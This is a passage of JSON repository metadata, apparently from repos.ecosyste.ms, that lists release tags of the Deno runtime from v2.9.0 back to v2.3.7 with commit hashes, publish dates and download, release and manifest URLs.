oland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.e